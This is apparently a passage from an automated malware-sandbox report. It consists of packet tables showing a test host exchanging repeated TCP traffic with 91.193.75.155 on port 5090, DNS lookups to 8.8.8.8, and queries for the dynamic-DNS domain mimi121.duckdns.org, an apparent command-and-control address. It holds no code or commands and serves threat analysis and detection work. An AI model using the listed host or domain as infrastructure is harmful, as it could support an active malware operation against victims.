                                                      Jan 22, 2021 07:33:35.741169930 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.741183996 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.741202116 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.741205931 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.741216898 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.741218090 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.741223097 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.741235018 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.741358042 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.741377115 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.742046118 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.742080927 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.742098093 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.742175102 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.744751930 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.744791031 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.744822025 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.744826078 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.744867086 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.745492935 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.747049093 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.747113943 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.747222900 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.747349977 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.747399092 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.747613907 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.748369932 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.748392105 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.748454094 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.749479055 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.749502897 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.749623060 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.749835968 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.749886990 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.750391006 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.750499964 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.750560999 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.750711918 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.750729084 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.750775099 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.751806021 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.751868010 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.751914978 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.751991987 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.752480030 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.752530098 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:35.805507898 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:35.856004000 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.110821009 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.111095905 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.111517906 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.111628056 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.111790895 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.111880064 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.126996040 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.127048969 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.127099037 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.137613058 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.137752056 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.137842894 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.184374094 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.184421062 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.184556961 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.201071024 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.201133966 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.201287985 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.201889038 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.202009916 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.202133894 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.202145100 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.202845097 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.202910900 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.202925920 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.203033924 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.203170061 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.204540014 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.204605103 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.204634905 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.204715014 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.204741001 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.204860926 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.205001116 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.205033064 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.205069065 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.205116034 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.212362051 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.212549925 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.212584972 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.212609053 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.212755919 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.213466883 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.213520050 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.213593960 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.213781118 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.213979959 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.217329979 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.217451096 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.217505932 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.217642069 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.217833042 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.217844963 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.218034029 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.218072891 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.218106985 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.218132019 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.218157053 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.218183041 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.218185902 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.218220949 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.218276024 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.218310118 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.218348980 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.218374014 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.218391895 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.218462944 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.220015049 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.220257044 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.220321894 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.220340967 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.220524073 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.220596075 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.223507881 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.223536015 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.223561049 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.223603964 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.223628044 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.223639011 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.223666906 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.223747015 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.223803997 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.223865986 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.224670887 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.224698067 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.224723101 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.224760056 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.224793911 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.225647926 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.225882053 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.225949049 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.226311922 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229666948 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229696989 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229721069 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229732037 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.229746103 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229768991 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229792118 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229800940 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.229814053 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229824066 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.229837894 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229859114 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.229861975 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229888916 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229914904 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229935884 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.229948044 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229974031 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.229981899 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.230427027 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.230463028 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.277945042 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.315588951 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.356023073 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.569027901 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.590044022 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.590081930 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.590104103 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.590125084 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.590146065 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.590238094 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.590292931 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.604041100 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.604079962 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.604168892 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.636842012 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.636884928 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.636902094 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.637031078 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.662944078 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.662972927 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.663099051 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.675867081 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.675903082 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.675990105 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.676038027 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.676115036 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.676141977 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.676167965 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.676266909 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.676482916 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.678551912 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.678590059 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.678617001 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.678636074 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.678668976 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.678698063 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.678764105 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.678788900 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.678814888 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.678843021 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.678880930 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.678942919 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.679032087 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.679104090 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.679163933 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.679193020 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.679217100 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.679265022 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.682539940 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.682698011 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.682765961 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.682811022 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:36.683063030 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:36.854082108 CET497875090192.168.2.491.193.75.155
                                                      Jan 22, 2021 07:33:37.039815903 CET50904978791.193.75.155192.168.2.4
                                                      Jan 22, 2021 07:33:37.106126070 CET497875090192.168.2.491.193.75.155

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 22, 2021 07:30:21.378611088 CET4925753192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:21.437596083 CET53492578.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:22.342644930 CET6238953192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:22.393596888 CET53623898.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:23.256931067 CET4991053192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:23.304858923 CET53499108.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:24.218707085 CET5585453192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:24.266788006 CET53558548.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:25.174165010 CET6454953192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:25.222306013 CET53645498.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:26.386390924 CET6315353192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:26.434209108 CET53631538.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:27.415808916 CET5299153192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:27.463816881 CET53529918.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:28.397255898 CET5370053192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:28.447101116 CET53537008.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:29.365123987 CET5172653192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:29.423111916 CET53517268.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:30.347744942 CET5679453192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:30.395719051 CET53567948.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:31.332916021 CET5653453192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:31.380970955 CET53565348.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:32.502029896 CET5662753192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:32.554056883 CET53566278.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:33.941205978 CET5662153192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:33.991930008 CET53566218.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:34.928697109 CET6311653192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:34.977129936 CET53631168.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:35.115108013 CET6407853192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:35.336199999 CET53640788.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:42.504307985 CET6480153192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:42.758469105 CET53648018.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:50.225294113 CET6172153192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:50.273416996 CET53617218.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:50.539695024 CET5125553192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:50.770622969 CET53512558.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:54.140110970 CET6152253192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:54.203713894 CET53615228.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:30:57.723223925 CET5233753192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:30:57.780884027 CET53523378.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:04.654083014 CET5504653192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:04.710472107 CET53550468.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:09.095591068 CET4961253192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:09.143719912 CET53496128.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:09.747498989 CET4928553192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:09.803611994 CET53492858.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:10.393574953 CET5060153192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:10.452713013 CET53506018.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:10.756057978 CET6087553192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:10.824704885 CET53608758.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:10.857202053 CET5644853192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:10.895068884 CET5917253192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:10.914729118 CET53564488.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:10.955908060 CET53591728.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:11.368948936 CET6242053192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:11.417228937 CET53624208.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:11.654519081 CET6057953192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:11.713551998 CET53605798.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:12.099128962 CET5018353192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:12.156215906 CET53501838.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:12.684833050 CET6153153192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:12.735503912 CET53615318.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:13.443432093 CET4922853192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:13.502599955 CET53492288.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:14.561983109 CET5979453192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:14.609958887 CET53597948.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:15.153989077 CET5591653192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:15.201973915 CET53559168.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:18.996299028 CET5275253192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:19.047084093 CET53527528.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:24.843041897 CET6054253192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:24.893831015 CET53605428.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:25.182035923 CET6068953192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:25.255044937 CET53606898.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:26.004311085 CET6420653192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:26.060651064 CET53642068.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:28.776148081 CET5090453192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:28.833760023 CET53509048.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:32.123198986 CET5752553192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:32.181315899 CET53575258.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:37.996712923 CET5381453192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:38.216588974 CET53538148.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:45.238523006 CET5341853192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:45.294686079 CET53534188.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:51.241583109 CET6283353192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:51.462378979 CET53628338.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:58.366811991 CET5926053192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:58.591681004 CET53592608.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:31:59.609966993 CET4994453192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:31:59.658224106 CET53499448.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:32:02.383984089 CET6330053192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:32:02.454840899 CET53633008.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:32:05.423141956 CET6144953192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:32:05.481987000 CET53614498.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:32:12.499536037 CET5127553192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:32:12.555836916 CET53512758.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:32:19.415810108 CET6349253192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:32:19.474915981 CET53634928.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:32:26.407856941 CET5894553192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:32:26.464147091 CET53589458.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:32:33.422535896 CET6077953192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:32:33.478782892 CET53607798.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:32:40.510041952 CET6401453192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:32:40.569143057 CET53640148.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:32:47.811078072 CET5709153192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:32:47.867594004 CET53570918.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:32:54.770771980 CET5590453192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:32:54.821542978 CET53559048.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:33:02.690608978 CET5210953192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:33:02.911175966 CET53521098.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:33:09.673223019 CET5445053192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:33:09.891906023 CET53544508.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:33:16.929156065 CET4937453192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:33:16.988557100 CET53493748.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:33:23.721820116 CET5043653192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:33:23.778325081 CET53504368.8.8.8192.168.2.4
                                                      Jan 22, 2021 07:33:30.837969065 CET6260553192.168.2.48.8.8.8
                                                      Jan 22, 2021 07:33:30.894315004 CET53626058.8.8.8192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Jan 22, 2021 07:30:35.115108013 CET192.168.2.48.8.8.80x8081Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:30:42.504307985 CET192.168.2.48.8.8.80x8b76Standard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:30:50.539695024 CET192.168.2.48.8.8.80x47bfStandard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
                                                      Jan 22, 2021 07:30:57.723223925 CET192.168.2.48.8.8.80x18bcStandard query (0)mimi121.duckdns.orgA (IP address)IN (0x0001)
